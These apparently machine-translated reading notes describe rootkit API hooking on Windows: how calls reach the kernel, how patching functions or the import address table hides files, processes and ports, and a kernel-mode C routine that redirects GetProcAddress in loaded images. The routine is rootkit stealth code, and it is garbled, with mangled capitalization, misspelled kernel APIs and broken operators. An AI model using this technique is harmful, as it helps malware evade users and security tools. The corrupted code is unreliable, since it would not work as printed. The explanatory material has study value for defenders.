Reading Notes _ windows APIHook Technology

First, we will introduce rootkits. rootkits is a high-end hacker technology that can run in the kernel state. It is at the same level as anti-virus software and is difficult to detect and clear.

In Windows, most processes depend on three subsystems: Win32, POSIX, and OS/2. These subsystems contain a set of well-described APIs, most programs depend on these APIs, so they are an excellent target for rootkit.

Let's take a look at the process in which an application calls the findnextfile function. findnextfile is the function exported by kernel32.dll. Therefore, the application loads kernel32.dll at runtime, and copy the memory address of these functions to your function import Address Table (import address table, IAT ). When an application calls findnextfile, the execution of the Process jumps to its position in IAT and continues from the address of the findnextfile function in kernel32.dll.

Then, findnextfile in kernel32.dll is called to NTDLL. dll. Ntdll. dll loads the equivalent kernel function of the function to the eax register, that is, the system service number of ntquerydirectoryfile, and the user space address of the function parameter to EDX. Then, an int 2E or sysenter command is sent to self-trap into the kernel.

Because the application loads kernel32.dll to its own private address space between 0x00010000 and 0x7ffe0000, as long as the rootkit can access the address space of the target process, it can directly override any function in kernel32.dll or the application's import table. This is called an API hook. In the private address of the application, you can find the starting address of the findnextfile function, and then rewrite the findnextfile function using manually written machine code to avoid listing specific files or changing the findnextfile performance. Rookit can also rewrite the import table (IAT) in the target application so that it points to the function written by itself rather than the function in kernel32.dll. By capturing API functions, you can hide processes, hide network ports, and redirect file write operations to other files to prevent applications from opening handles of specific processes. The following describes the iat hook:

When an application uses a function in another library, the address of the function must be imported. All the DLL used by the application is included in the IMAGE_IMPORT_DESCRIPTOR structure of the application file system image. This structure contains the DLL name of the function imported by the application, and two IMAGE_IMPORT_BY_NAME array pointers. The IMGE_IMPORT_BY_NAME structure contains the name of the import function used by the application.

When the operating system loads the application to the memory, it analyzes the IMAGE_IMPORT_DESCRIPTOR structure and loads all the required DLL files into the memory of the application. Once the DLL is mapped, the operating system locates each imported function in the memory and overwrites an IMAGE_IMPORT_BY_NAME Array Using the actual address of the function. Once the rootkit hook function is in the application address space, rootkit can analyze the PE format of the target application in memory and replace the address of the target function in IAT with the address of the hook function. Then, when the target function is called, the hook function is executed instead of the original function.

Whether in the kernel space or user space, when an executable image is mapped to the virtual memory, you can capture the imported image file by registering the PsSetLoadImageNotifyRoutine function. Its only parameter is the image analysis callback function. The process of changing the function address in IAT is as follows:

PIMAGE_DOS_HEADER dosHeader; PIMAGE_NT_HEADERS pNTHeader; Pimage_import_descriptor importdesc; Pimage_import_by_name p_ibn; DWORD importsstartrva; Pword pd_iat, pd_into; Int count, index; Char * dll_name = NULL; Char * pc_dlltar = "kernel32.dll "; Char * pc_fnctar = "getprocaddress "; PMDL p_mdl; PDWORD MappedImTable; // Import the PVOID ImageBase variable in the IMAGE_INFO structure. DosHeader = (PIMAGE_DOS_HEADER) image_addr;   // Macro, pointer operation PNTHeader = MakePtr (PIMAGE_NT_HEADERS, dosHeader, dosHeader-> e_lfanew );   // Identify whether the file is a standard PE file by using the Signature field of the PE File If (pNTHeader-> Signature! = IMAGE_NT_SIGNATURE) Return STATUS_INVALID_IMAGE_FORMAT; // RVA of the import segment ImportsStartRVA = pNTHeader-> OptionalHeader. DataDirectory [IMAGE_DIRECTORY_ENTRY_IMPORT]. VirtualAddress;   If (! ImportsStartRVA) Return STATUS_INVALID_IMAGE_FORMAT; // Add the RVA of the import segment and the starting address (dosHeader) of the module in the memory. // Pointer to the first IMAGE_IMPORT_DESCRIPTOR ImportDesc = (PIMAGE_IMPORT_DESCRIPTOR) (importsStartRVA + (DWORD) dosHeader ); // Filter each image_import_descriptor For (COUNT = 0; importdesc [count]. characteristics! = 0; count ++) { // Obtain the DLL name of the import module. Dll_name = (char *) (importdesc [count]. Name + (DWORD) dosheader ); // Obtain IAT Pd_iat = (pdword) (DWORD) dosheader) + (DWORD) importdesc [count]. firstthunk ); // Obtain the pointer array pointing to the image_import_by_name Structure Pd_INTO = (PDWORD) (DWORD) dosHeader) + (DWORD) importDesc [count]. OriginalFirstThunk ); // Filter in IAT to find the specific dll and function to be hooked For (index = 0; pd_IAT [index]! = 0; index ++) { // If this is an import by ordinal // The high bit is set If (pd_INTO [index] & IMAGE_ORDINAL_FLAG )! = IMAGE_ORDINAL_FLAG) { // Obtain the function name Structure P_ibn = (pimage_import_by_name) (pd_into [Index] + (DWORD) dosheader )); // Compare the DLL name and function name to find the required If (_ stricmp (dll_name, pc_dlltar) = 0) & (strcmp (p_ibn-> Name, pc_fnctar) = 0 )) { // Use the trick you already learned to map a different // Virtual address to the same physical page so no permission problems // // Map the memory into our domain so we can change // Permissions on the MDL // Modify the Memory attribute to modify the IAT attribute // Modify memory attributes using the MDL method. This will be detailed in future articles. P_mdl = mmcreatemdl (null, & pd_iat [Index], 4 ); If (! P_mdl) Return status_unsuccessful; Mmbuildmdlfornonpagedpool (p_mdl ); // Change the flags of MDL P_mdl-> mdlflags = p_mdl-> mdlflags | mdl_mapped_to_system_va; MappedImTable = MmMapLocakedPages (p_mdl, KernelMode );   // Address of the "new function" // Point "GetProcAddress" to a defined function * MappedImTable = d_shareM; // Free MDL Mmunmaploackedpages (mappedimtable, p_mdl ); IoFreeMdl (p_mdl );   } } } Return STATUS_SUCCESS;   }